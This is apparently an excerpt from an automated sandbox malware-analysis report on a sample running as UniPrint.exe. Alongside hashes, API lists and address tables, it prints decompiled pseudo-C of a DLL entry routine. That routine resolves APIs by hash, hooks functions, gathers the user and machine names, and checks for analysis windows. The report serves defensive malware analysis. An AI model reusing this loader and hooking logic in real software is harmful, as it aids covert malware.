                                                                                                        • Instruction Fuzzy Hash: C5D0A772409DB02EF30352108C04B8F7A98CF17300F0948A2E440E21D0C27C5C818FFD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004057B2, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 54%
                                                                                                        			E004057B2(CHAR* __eax, intOrPtr _a8) {
				CHAR* _v0;
				CHAR* _t8;
				void* _t9;
				CHAR* _t13;
				CHAR* _t14;

				_t8 = __eax;
				_push(_a8);
				L00405B7C();
				_t13 = __eax;
				_t14 = _v0;
				while(1) {
					_push(_t14);
					L00405B7C();
					if(_t8 < _t13) {
						break;
					}
					 *(_t13 + _t14) =  *(_t13 + _t14) & 0x00000000;
					_t9 =  *0x4070f0(_t14, _v0);
					if(_t9 == 0) {
						return _t14;
					}
					_t8 = CharNextA(_t14);
					_t14 = _t8;
				}
				return 0;
			}








                                                                                                        0x004057b2
                                                                                                        0x004057b5
                                                                                                        0x004057b9
                                                                                                        0x004057be
                                                                                                        0x004057c0
                                                                                                        0x004057e8
                                                                                                        0x004057e8
                                                                                                        0x004057e9
                                                                                                        0x004057f0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004057cd
                                                                                                        0x004057d2
                                                                                                        0x004057dd
                                                                                                        0x00000000
                                                                                                        0x004057fa
                                                                                                        0x004057e0
                                                                                                        0x004057e6
                                                                                                        0x004057e6
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • lstrlen.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                        • lstrcmpi.KERNEL32 ref: 004057D2
                                                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004057E0
                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 190613189-0
                                                                                                        • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                        • Instruction ID: 042c172281cf084eebf1820456e7eb749b121a10276c912c68532230cfd8689c
                                                                                                        • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                        • Instruction Fuzzy Hash: BBF0A736249D51DBC2029B295C44E6FBEA4EF95355F14057EF440F3180D335AC11ABBB
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Analysis Process: UniPrint.exe PID: 6532 Parent PID: 6416 UniPrint.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 70988AF0, Relevance: 200.5, APIs: 110, Strings: 4, Instructions: 1015memorystringthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			_entry_(struct HINSTANCE__* _a4, intOrPtr _a8) {
				char _v536;
				short _v552;
				short _v556;
				short _v592;
				short _v596;
				short _v600;
				short _v604;
				short _v608;
				short _v612;
				short _v616;
				short _v620;
				short _v624;
				intOrPtr _v628;
				int _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				int _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				int _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				int _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				int _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				int _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				int _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				int _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				int _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				int _v776;
				intOrPtr _v780;
				char _v784;
				intOrPtr _v788;
				int _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				int _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				int _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				int _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				void* _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				void* _v872;
				long _v876;
				intOrPtr _v880;
				char _v884;
				long _v892;
				int _v900;
				short _v904;
				intOrPtr _v908;
				int _v916;
				intOrPtr _v920;
				int _v924;
				intOrPtr _v928;
				int _v932;
				intOrPtr _v936;
				int _v940;
				intOrPtr _v944;
				int _v948;
				int _v952;
				int _v956;
				int _v960;
				int _v964;
				char _v968;
				char _v972;
				short _v974;
				char _v976;
				short _v978;
				char _v980;
				short _v982;
				char _v984;
				short _v986;
				short _v988;
				int _v992;
				char _v996;
				intOrPtr _v1000;
				struct HINSTANCE__* _v1004;
				intOrPtr _t229;
				void* _t230;
				void* _t231;
				void* _t232;
				void* _t233;
				void* _t234;
				void* _t235;
				void* _t236;
				struct HINSTANCE__* _t238;
				struct HINSTANCE__* _t239;
				struct HINSTANCE__* _t240;
				struct HINSTANCE__* _t241;
				struct HINSTANCE__* _t242;
				struct HINSTANCE__* _t243;
				struct HINSTANCE__* _t244;
				void* _t245;
				void* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				WCHAR* _t284;
				WCHAR* _t288;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t296;
				WCHAR* _t298;
				long _t299;
				WCHAR* _t301;
				intOrPtr _t303;
				intOrPtr _t304;
				void* _t306;
				WCHAR* _t323;
				intOrPtr _t329;
				short* _t330;
				WCHAR* _t333;
				signed int _t334;
				int _t337;
				struct HINSTANCE__* _t338;
				struct HINSTANCE__* _t340;
				char _t342;
				void* _t343;
				struct HINSTANCE__* _t347;
				WCHAR* _t350;
				struct HINSTANCE__* _t353;
				void* _t354;
				struct HINSTANCE__* _t358;
				void* _t359;
				struct HINSTANCE__* _t363;
				WCHAR* _t365;
				struct HINSTANCE__* _t368;
				void* _t369;
				struct HINSTANCE__* _t373;
				void* _t375;
				struct HINSTANCE__* _t381;
				intOrPtr _t382;
				intOrPtr _t395;
				char* _t396;
				struct HWND__* _t398;
				struct HWND__* _t400;
				char _t403;
				signed short* _t408;
				signed short* _t409;
				int _t410;
				WCHAR* _t413;
				WCHAR* _t414;
				void* _t417;
				void* _t418;
				WCHAR* _t420;
				int _t421;
				long _t426;
				WCHAR* _t428;
				intOrPtr _t429;
				void* _t430;
				WCHAR* _t431;
				intOrPtr* _t433;
				WCHAR* _t436;
				void* _t438;
				WCHAR* _t441;
				WCHAR* _t445;
				WCHAR* _t459;
				WCHAR* _t461;
				WCHAR* _t465;
				WCHAR* _t466;
				WCHAR* _t467;
				void* _t471;
				WCHAR* _t472;
				WCHAR* _t473;
				WCHAR* _t476;
				WCHAR* _t477;
				WCHAR* _t478;
				WCHAR* _t481;
				WCHAR* _t483;
				WCHAR* _t484;
				intOrPtr _t489;
				intOrPtr _t497;
				WCHAR* _t498;
				void* _t507;
				signed int _t508;
				void** _t511;
				intOrPtr* _t514;
				void* _t517;
				void* _t520;
				void* _t521;
				void* _t525;
				void* _t528;
				void* _t530;
				void* _t532;
				void* _t534;
				void* _t536;
				void* _t538;
				void* _t540;
				void* _t542;
				void* _t546;

				_t520 =  &_v908;
				_t229 = _a8;
				if(_t229 == 0) {
					_t230 =  *0x7098f578; // 0xb63c90
					__eflags = _t230;
					if(_t230 != 0) {
						HeapFree(GetProcessHeap(), 0, _t230);
					}
					_t231 =  *0x7098f5cc; // 0xb757b8
					__eflags = _t231;
					if(_t231 != 0) {
						HeapFree(GetProcessHeap(), 0, _t231);
					}
					_t232 =  *0x7098f5d4; // 0xb7c4e8
					__eflags = _t232;
					if(_t232 != 0) {
						HeapFree(GetProcessHeap(), 0, _t232);
					}
					_t233 =  *0x7098f5e0; // 0xb52c80
					__eflags = _t233;
					if(_t233 != 0) {
						HeapFree(GetProcessHeap(), 0, _t233);
					}
					_t234 =  *0x7098f5a8; // 0xb76080
					__eflags = _t234;
					if(_t234 != 0) {
						_push(_t234);
						__eflags =  *0x7098f5ac; // 0x1
						if(__eflags == 0) {
							HeapFree(GetProcessHeap(), 0, ??);
						} else {
							L7098BF7A();
						}
					}
					_t235 =  *0x7098f5b4; // 0xb71e90
					__eflags = _t235;
					if(_t235 != 0) {
						_push(_t235);
						__eflags =  *0x7098f5b8; // 0x1
						if(__eflags == 0) {
							HeapFree(GetProcessHeap(), 0, ??);
						} else {
							L7098BF7A();
						}
					}
					_t236 =  *0x7098f57c; // 0xb7ea60
					__eflags = _t236;
					if(_t236 != 0) {
						HeapFree(GetProcessHeap(), 0, _t236);
					}
					__eflags =  *0x7098f6c8; // 0x1
					if(__eflags != 0) {
						_t238 =  *0x7098f558; // 0x6caf0000
						__eflags = _t238;
						if(_t238 != 0) {
							FreeLibrary(_t238);
						}
						_t239 =  *0x7098f540; // 0x77400000
						__eflags = _t239;
						if(_t239 != 0) {
							FreeLibrary(_t239);
						}
						_t240 =  *0x7098f544; // 0x760b0000
						__eflags = _t240;
						if(_t240 != 0) {
							FreeLibrary(_t240);
						}
						_t241 =  *0x7098f548; // 0x75d50000
						__eflags = _t241;
						if(_t241 != 0) {
							FreeLibrary(_t241);
						}
						_t242 =  *0x7098f54c; // 0x73de0000
						__eflags = _t242;
						if(_t242 != 0) {
							FreeLibrary(_t242);
						}
						_t243 =  *0x7098f550; // 0x75ec0000
						__eflags = _t243;
						if(_t243 != 0) {
							FreeLibrary(_t243);
						}
						_t244 =  *0x7098f554; // 0x708c0000
						__eflags = _t244;
						if(_t244 != 0) {
							FreeLibrary(_t244);
						}
						_t245 =  *0x7098f5c8; // 0xb64190
						__eflags = _t245;
						if(_t245 != 0) {
							HeapFree(GetProcessHeap(), 0, _t245);
						}
						_t246 =  *0x7098f5a0; // 0xb61638
						__eflags = _t246;
						if(_t246 != 0) {
							LocalFree(_t246);
						}
						__eflags =  *0x7098f6c4 - 2;
						if( *0x7098f6c4 == 2) {
							E7098BBC0(0);
						}
						__eflags =  *0x7098f6c4; // 0x2
						if(__eflags > 0) {
							E7098B890();
						}
						_t511 = 0x7098f51c;
						do {
							_t247 =  *_t511;
							__eflags = _t247;
							if(_t247 != 0) {
								CloseHandle(_t247);
							}
							_t511 =  &(_t511[1]);
							__eflags = _t511 - 0x7098f528;
						} while (_t511 < 0x7098f528);
						_t248 =  *0x7098f5c0; // 0x0
						__eflags = _t248;
						if(_t248 != 0) {
							NtTerminateThread(_t248, 0);
							_t250 =  *0x7098f5c0; // 0x0
							CloseHandle(_t250);
						}
					}
					goto L108;
				} else {
					if(_t229 != 1) {
						L108:
						return 1;
					} else {
						DisableThreadLibraryCalls(_a4);
						 *0x7098f538 = GetModuleHandleW(0);
						_v904 = 0;
						_t284 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						 *0x7098f578 = _t284;
						if(GetSystemDirectoryW(_t284, 0x105) == 0) {
							ExitProcess(0);
						}
						_t428 =  *0x7098f578; // 0xb63c90
						PathAddBackslashW(_t428);
						_t288 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						 *0x7098f5cc = _t288;
						 *0x7098f5dc = GetModuleFileNameW(_a4, _t288, 0x104);
						_t291 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						_t429 =  *0x7098f5dc; // 0x33
						_t430 =  *0x7098f5cc; // 0xb757b8
						 *0x7098f5d4 = _t291;
						RtlMoveMemory(_t291, _t430, _t429 + _t429);
						_t292 =  *0x7098f5cc; // 0xb757b8
						_t465 =  *0x7098f5d4; // 0xb7c4e8
						 *0x7098f5d8 = _t465;
						PathRemoveFileSpecW(_t292);
						_t431 =  *0x7098f5cc; // 0xb757b8
						PathAddBackslashW(_t431);
						_t466 =  *0x7098f5cc; // 0xb757b8
						SetCurrentDirectoryW(_t466);
						_t296 =  *0x7098f5cc; // 0xb757b8
						 *0x7098f5d0 = _t296; // executed
						__imp__SHGetSpecialFolderPathW(0,  &_v536, 0, 0); // executed
						if(_t296 != 0) {
							PathAddBackslashW( &_v552);
							lstrcatW( &_v556, StrChrW(0x7098ce48, 0x66));
							_t426 = GetFileAttributesW( &_v556); // executed
							if(_t426 == 0xffffffff) {
								goto L7;
							} else {
								ExitProcess(0);
							}
						}
						L7:
						_t298 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						 *0x7098f5e0 = _t298;
						_t299 = GetModuleFileNameW(0, _t298, 0x104);
						_t467 =  *0x7098f5e0; // 0xb52c80
						 *0x7098f5e8 = _t299;
						 *0x7098f5ec = PathFindFileNameW(_t467);
						_t301 =  *0x7098f5e0; // 0xb52c80
						 *0x7098f5e4 = _t301;
						L7098BF02();
						 *0x7098f2a8 = 0x11c;
						L7098BF62();
						 *0x7098f5f8 = E709833D0(0);
						_t303 = E70983370(0);
						_t521 = _t520 + 8;
						 *0x7098f5f4 = _t303;
						__imp__WTSGetActiveConsoleSessionId(0x7098f2a8, 0x7098f2a8, 0x11c);
						_t433 =  *0x7098f538; // 0x400000
						 *0x7098f598 = _t303;
						if( *_t433 != 0x5a4d) {
							goto L108;
						} else {
							_t10 = _t433 + 0x3c; // 0x100
							_t514 =  *_t10 + _t433;
							if( *_t514 != 0x4550) {
								goto L108;
							} else {
								_v948 =  *((intOrPtr*)(_t514 + 0x58));
								_push( &_v856);
								_push(0x7098f5a8);
								_push(5);
								_push(_t303);
								_push(0);
								_v840 =  *((intOrPtr*)(_t514 + 8));
								_v856 = 0;
								L7098BF80(); // executed
								if(_t303 != 0) {
									 *0x7098f5ac = 1;
								} else {
									_t420 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
									 *0x7098f5a8 = _t420;
									if(_t420 != 0) {
										_v876 = 0x104;
										_t421 = GetUserNameW(_t420,  &_v876);
										if(_t421 == 0) {
											_t461 =  *0x7098f5a8; // 0xb76080
											 *_t461 = _t421;
										}
									}
								}
								_t304 =  *0x7098f598; // 0x1
								_push( &_v872);
								_push(0x7098f5b4);
								_push(7);
								_push(_t304);
								_push(0);
								_v872 = 0;
								L7098BF80(); // executed
								if(_t304 != 0) {
									 *0x7098f5b8 = 1;
								} else {
									_t417 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
									 *0x7098f5b4 = _t417;
									if(_t417 != 0) {
										_v892 = 0x104;
										__imp__GetComputerNameExW(2, _t417,  &_v892);
										if(_t417 == 0) {
											_t418 =  *0x7098f5b4; // 0xb71e90
											 *_t418 = 0;
										}
									}
								}
								_t436 =  *0x7098f5a8; // 0xb76080
								_t471 =  *0x7098f5b4; // 0xb71e90
								 *0x7098f5a4 = _t436;
								 *0x7098f5b0 = _t471;
								_t306 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
								 *0x7098f57c = _t306;
								if(_t306 != 0) {
									_push(StrChrW(0x7098cdf0, 0x2e));
									_push(StrChrW(0x7098ce30, 0x54));
									_t413 =  *0x7098f5cc; // 0xb757b8
									_push(_t413);
									_t414 = StrChrW(0x7098ca08, 0x25);
									_t459 =  *0x7098f57c; // 0xb7ea60
									wsprintfW(_t459, _t414);
									_t498 =  *0x7098f57c; // 0xb7ea60
									_t521 = _t521 + 0x14;
									 *0x7098f580 = _t498;
								}
								if(_v988 == 0x435a88 || _v880 == 0x4b4ca51f) {
									_push(0x7098f5a0);
									 *0x7098f6c8 = 1;
									 *0x7098f55c = E709834E0();
									 *0x7098f630 = E70981DE0(0x4b7826af, _t514);
									 *0x7098f5c8 = E7098A810(_t308, 0, 0);
									 *0x7098f5fc = E70981DE0(0x4b74e943, _t514);
									 *0x7098f620 = E70981DE0(0x4b748227, _t514);
									 *0x7098f600 = E70981DE0(0x4b78da29, _t514);
									 *0x7098f604 = E70981DE0(0x4b78da2b, _t514);
									 *0x7098f624 = E70981DE0(0x4b748f8b, _t514);
									 *0x7098f628 = E70981DE0(0x4b75d29f, _t514);
									 *0x7098f62c = E70981DE0(0x4b748f4f, _t514);
									 *0x7098f608 = E70981DE0(0x4b75cfdb, _t514);
									 *0x7098f60c = E70981DE0(0x4b7b65cf, _t514);
									 *0x7098f610 = E70981DE0(0x4b7b46e7, _t514);
									 *0x7098f614 = E70981DE0(0x4b74fb9f, _t514);
									 *0x7098f618 = E70981DE0(0x4b7813df, _t514);
									 *0x7098f61c = E70981DE0(0x4b7b324b, _t514);
									_t323 = E70981DE0(0x4b74bac7, _t514);
									 *0x7098f58c = _t323;
									 *0x7098f590 = lstrlenW(_t323);
									 *0x7098f634 = E70981DE0(0x4b785a9f, _t514);
									 *0x7098f588 = E70981DE0(0x4b752f43, _t514);
									 *0x7098f584 = E70981DE0(0x4b752097, _t514);
									 *0x7098f638 = E70981DE0(0x4b78d5c7, _t514);
									_t329 = E70981DE0(0x4b78d567, _t514);
									_t525 = _t521 + 0xb0;
									 *0x7098f52c = _t329;
									_t330 = GetCommandLineW();
									_t437 =  &_v900;
									_v900 = 0;
									_t517 = CommandLineToArgvW(_t330,  &_v900);
									if(_t517 != 0) {
										CharLowerW( *_t517);
										_t497 = _v908;
										if(_t497 > 1) {
											_t508 = 1;
											do {
												if(_t508 >= _t497 - 1) {
													L30:
													_t408 =  *(_t517 + _t508 * 4);
													_t437 =  *_t408 & 0x0000ffff;
													__eflags = _t437 - 0x6b;
													if(_t437 != 0x6b) {
														L33:
														__eflags = _t437 - 0x66;
														if(_t437 == 0x66) {
															__eflags = _t408[1];
															if(_t408[1] == 0) {
																 *0x7098f568 = 1;
															}
														}
													} else {
														__eflags = _t408[1];
														if(_t408[1] != 0) {
															goto L33;
														} else {
															 *0x7098f564 = 1;
														}
													}
												} else {
													_t409 =  *(_t517 + _t508 * 4);
													if( *_t409 != 0x77 || _t409[1] != 0) {
														goto L30;
													} else {
														_t437 =  *(_t517 + 4 + _t508 * 4);
														_t508 = _t508 + 1;
														_t410 = StrToIntW(_t437);
														_t497 = _v908;
														 *0x7098f5c4 = _t410;
													}
												}
												_t508 = _t508 + 1;
											} while (_t508 < _t497);
										}
										LocalFree(_t517);
									}
									_push(8);
									_push(0x7098f3c8);
									L7098BF02();
									_t472 =  *0x7098f5cc; // 0xb757b8
									E709821D0(_t437, _t472, 1);
									_t333 =  *0x7098f5a0; // 0xb61638
									_t438 =  *0x7098f5b0; // 0xb71e90
									_t473 =  *0x7098f5a4; // 0xb76080
									_t334 = E709832A0(_t473, _t438, _t333);
									_v900 = 0;
									_t441 =  *0x7098f5a0; // 0xb61638
									_v904 = 0x640067;
									 *0x7098f594 = _t334 % 0x7fffffff;
									_t476 =  *0x7098f57c; // 0xb7ea60
									_t337 = GetPrivateProfileIntW(_t441,  &_v904, 0, _t476);
									_t477 =  *0x7098f5d4; // 0xb7c4e8
									 *0x7098f56c = _t337; // executed
									_t338 = GetModuleHandleW(_t477); // executed
									 *0x7098f53c = _t338;
									_t340 = GetModuleHandleW(E70981DE0(0x4b78c927, _t514));
									_push(0x4b4ca51f);
									_push(1);
									_push( &_v996);
									_push(_t340);
									_v1004 = _t340;
									_v996 = 0x8059adc3;
									_v992 = 0;
									_v988 = 0;
									_v984 = 0;
									E70981E40();
									_t342 = _v984;
									_t528 = _t525 + 0x2c;
									if(_t342 != 0) {
										 *0x7098f63c = _t342;
									}
									_t343 = E70981DE0(0x4b7828f7, _t514);
									_t478 =  *0x7098f578; // 0xb63c90
									_push(_t343);
									_push(_t478);
									wsprintfW( &_v624, StrChrW(0x7098c658, 0x25));
									_t530 = _t528 + 0x18;
									_t347 = LoadLibraryW( &_v616); // executed
									 *0x7098f558 = _t347;
									if(E7098B840() != 0) {
										ExitProcess(0);
									}
									 *0x7098f6c4 = 1;
									if(_v1000 != 0) {
										_push(0x4b4ca51f);
										_push(1);
										_push( &_v992);
										_push(_v1000);
										_v992 = 0x651c9114;
										_v988 = 0;
										_v984 = 0;
										_v980 = 0;
										E70981E40();
										_t403 = _v980;
										_t546 = _t530 + 0x10;
										if(_t403 != 0) {
											 *0x7098f640 = _t403;
										}
										_v992 = 0xeaa34c36;
										_v988 = E70988210;
										_v984 = 0x7098f654;
										_v980 = 0;
										_v976 = 0x92e0814c;
										_v972 = E70987E20;
										_v968 = 0x7098f644;
										_v964 = 0;
										_v960 = 0x3ed5a6e3;
										_v956 = E709881F0;
										_v952 = 0x7098f650;
										_v948 = 0;
										_v944 = 0x6107e09f;
										_v940 = E70988830;
										_v936 = 0x7098f6a8;
										_v932 = 0;
										_v928 = 0x3aebf048;
										_v924 = E709888B0;
										_v920 = 0x7098f6ac;
										_v916 = 0;
										E70982030(_v1000,  &_v992, 5, 0x4b4ca51f);
										_t530 = _t546 + 0x10;
									}
									_push(E70981DE0(0x4b783357, _t514));
									_t350 =  *0x7098f578; // 0xb63c90
									_push(_t350);
									wsprintfW( &_v620, StrChrW(0x7098c658, 0x25));
									_t532 = _t530 + 0x18;
									_t353 = LoadLibraryW( &_v612);
									 *0x7098f540 = _t353;
									if(_t353 != 0) {
										_v884 = 0x4ae1b56a;
										_v880 = E709884F0;
										_v876 = 0x7098f698;
										_v872 = 0;
										_v868 = 0x869989e7;
										_v864 = E709886B0;
										_v860 = 0x7098f69c;
										_v856 = 0;
										_v852 = 0x8d4f8a9b;
										_v848 = E70988700;
										_v844 = 0x7098f6a0;
										_v840 = 0;
										_v836 = 0xce63a911;
										_v832 = E70988430;
										_v828 = 0x7098f670;
										_v824 = 0;
										_v820 = 0x9e791828;
										_v816 = E70988460;
										_v812 = 0x7098f674;
										_v808 = 0;
										_v804 = 0xd0d264;
										_v800 = E70988410;
										_v796 = 0x7098f668;
										_v792 = 0;
										_v788 = 0x6e9aa133;
										_v784 = E709884E0;
										_v780 = 0x7098f690;
										_v776 = 0;
										_v772 = 0x1c61f891;
										_v768 = E709883F0;
										_v764 = 0x7098f660;
										_v760 = 0;
										_v756 = 0xe8b54dc0;
										_v752 = E709883F0;
										_v748 = 0x7098f664;
										_v744 = 0;
										_v740 = 0xa09afab7;
										_v736 = E70988420;
										_v732 = 0x7098f694;
										_v728 = 0;
										_v724 = 0xd332de47;
										_v720 = E709884A0;
										_v716 = 0x7098f678;
										_v712 = 0;
										_v708 = 0xf64096c4;
										_v704 = E709884B0;
										_v700 = 0x7098f67c;
										_v696 = 0;
										_v692 = 0x8a0a6997;
										_v688 = E70988420;
										_v684 = 0x7098f66c;
										_v680 = 0;
										_v676 = 0xd9d93036;
										_v672 = E709884C0;
										_v668 = 0x7098f680;
										_v664 = 0;
										_v660 = 0xec1f4ad0;
										_v656 = E70988420;
										_v652 = 0x7098f684;
										_v648 = 0;
										_v644 = 0x7ef19b3a;
										_v640 = E709883A0;
										_v636 = 0x7098f658;
										_v632 = 0;
										_v628 = 0x1b80502b;
										_v624 = E709883D0;
										_v620 = 0x7098f65c;
										_v616 = 0;
										E70982030(_t353,  &_v884, 0x11, 0x4b4ca51f);
										_t489 =  *0x7098f628; // 0x798f80
										_t157 = _t489 + 9; // 0x6854706f
										_v988 =  *_t157;
										_t395 =  *0x7098f618; // 0x74cec0
										_t159 = _t395 + 0x1e; // 0x65006c
										_t532 = _t532 + 0x10;
										_v986 =  *_t159 & 0x0000ffff;
										_t161 = _t395 + 0x1e; // 0x65006c
										_t396 =  *0x7098f624; // 0x784294
										_v984 =  *_t161 & 0x0000ffff;
										_t163 = _t396 + 1; // 0x61476e79
										_v982 =  *_t163;
										_v978 = 0x62;
										_v980 =  *_t396;
										_t167 = _t396 + 3; // 0x65746147
										_v976 =  *_t167;
										_v974 = 0;
										_t398 = FindWindowW( &_v988, 0); // executed
										_v992 = _t398;
										_v976 = 0;
										_t400 = FindWindowW( &_v988, 0); // executed
										_v992 = _v992 + _t400;
									}
									_t354 = E70981DE0(0x4b783013, _t514);
									_t445 =  *0x7098f578; // 0xb63c90
									_push(_t354);
									_push(_t445);
									wsprintfW( &_v616, StrChrW(0x7098c658, 0x25));
									_t534 = _t532 + 0x18;
									_t358 = LoadLibraryW( &_v608);
									 *0x7098f544 = _t358;
									if(_t358 != 0) {
										_v984 = 0x54e404c6;
										_v980 = E709884D0;
										_v976 = 0x7098f68c;
										_v972 = 0;
										_v968 = 0xefb3afee;
										_v964 = E70988410;
										_v960 = 0x7098f688;
										_v956 = 0;
										_v952 = 0x74c5f994;
										_v948 = E70988990;
										_v944 = 0x7098f6b8;
										_v940 = 0;
										_v936 = 0x14a997fc;
										_v932 = E709889C0;
										_v928 = 0x7098f6bc;
										_v924 = 0;
										E70982030(_t358,  &_v984, 4, 0x4b4ca51f);
										_t534 = _t534 + 0x10;
									}
									_t359 = E70981DE0(0x4b7830ff, _t514);
									_t481 =  *0x7098f578; // 0xb63c90
									_push(_t359);
									_push(_t481);
									wsprintfW( &_v612, StrChrW(0x7098c658, 0x25));
									_t536 = _t534 + 0x18;
									_t363 = LoadLibraryW( &_v604);
									 *0x7098f548 = _t363;
									if(_t363 != 0) {
										_v980 = 0xeb4d73d6;
										_v976 = E70988140;
										_v972 = 0x7098f648;
										_v968 = 0;
										_v964 = 0x7ea26a9d;
										_v960 = E709881A0;
										_v956 = 0x7098f64c;
										_v952 = 0;
										E70982030(_t363,  &_v980, 2, 0x4b4ca51f);
										_t536 = _t536 + 0x10;
									}
									_push(E70981DE0(0x4b78304b, _t514));
									_t365 =  *0x7098f578; // 0xb63c90
									_push(_t365);
									wsprintfW( &_v608, StrChrW(0x7098c658, 0x25));
									_t538 = _t536 + 0x18;
									_t368 = LoadLibraryW( &_v600);
									 *0x7098f54c = _t368;
									if(_t368 != 0) {
										_v976 = 0x79e81cff;
										_v972 = E709888E0;
										_v968 = 0x7098f6b0;
										_v964 = 0;
										E70982030(_t368,  &_v976, 1, 0x4b4ca51f);
										_t538 = _t538 + 0x10;
									}
									_t369 = E70981DE0(0x4b78309b, _t514);
									_t483 =  *0x7098f578; // 0xb63c90
									_push(_t369);
									_push(_t483);
									wsprintfW( &_v604, StrChrW(0x7098c658, 0x25));
									_t540 = _t538 + 0x18;
									_t373 = LoadLibraryW( &_v596); // executed
									 *0x7098f550 = _t373;
									if(_t373 != 0) {
										_v972 = 0xefae4bd4;
										_v968 = E709884E0;
										_v964 = 0x7098f6a4;
										_v960 = 0;
										E70982030(_t373,  &_v972, 1, _v976 + 0x4b4ca51f);
										_t540 = _t540 + 0x10;
									}
									_t375 = E7098A810(E70981DE0(0x4b0c84db, _t514), 0, 0);
									_t484 =  *0x7098f578; // 0xb63c90
									_t507 = _t375;
									_push(_t507);
									_push(_t484);
									wsprintfW( &_v600, StrChrW(0x7098c658, 0x25));
									_t542 = _t540 + 0x24;
									HeapFree(GetProcessHeap(), 0, _t507);
									_t381 = LoadLibraryW( &_v592);
									 *0x7098f554 = _t381;
									if(_t381 != 0) {
										_v968 = 0xd80564c;
										_v964 = E70988960;
										_v960 = 0x7098f6b4;
										_v956 = 0;
										E70982030(_t381,  &_v968, 1, 0x4b4ca51f);
										_t542 = _t542 + 0x10;
									}
									_t382 = E70983340(0xffffffff);
									_push(0xa);
									_push(0x10);
									 *0x7098f59c = _t382;
									_push(StrChrW(0x7098ce20, 0x31));
									_push(E70981DE0(0x4b0e0c3b, _t514));
									E709889F0();
									if(E7098BBA0(0) != 0) {
										ExitProcess(0);
									}
									 *0x7098f6c4 = 2;
									return 1;
								} else {
									goto L108;
								}
							}
						}
					}
				}
			}
































































































































































































































                                                                                                        0x70988af4
                                                                                                        0x70988afe
                                                                                                        0x70988b02
                                                                                                        0x7098996d
                                                                                                        0x7098997e
                                                                                                        0x70989980
                                                                                                        0x70989987
                                                                                                        0x70989987
                                                                                                        0x70989989
                                                                                                        0x7098998e
                                                                                                        0x70989990
                                                                                                        0x70989997
                                                                                                        0x70989997
                                                                                                        0x70989999
                                                                                                        0x7098999e
                                                                                                        0x709899a0
                                                                                                        0x709899a7
                                                                                                        0x709899a7
                                                                                                        0x709899a9
                                                                                                        0x709899ae
                                                                                                        0x709899b0
                                                                                                        0x709899b7
                                                                                                        0x709899b7
                                                                                                        0x709899b9
                                                                                                        0x709899be
                                                                                                        0x709899c0
                                                                                                        0x709899c2
                                                                                                        0x709899c3
                                                                                                        0x709899c9
                                                                                                        0x709899d6
                                                                                                        0x709899cb
                                                                                                        0x709899cb
                                                                                                        0x709899cb
                                                                                                        0x709899c9
                                                                                                        0x709899d8
                                                                                                        0x709899dd
                                                                                                        0x709899df
                                                                                                        0x709899e1
                                                                                                        0x709899e2
                                                                                                        0x709899e8
                                                                                                        0x709899f5
                                                                                                        0x709899ea
                                                                                                        0x709899ea
                                                                                                        0x709899ea
                                                                                                        0x709899e8
                                                                                                        0x709899f7
                                                                                                        0x709899fc
                                                                                                        0x709899fe
                                                                                                        0x70989a05
                                                                                                        0x70989a05
                                                                                                        0x70989a07
                                                                                                        0x70989a0d
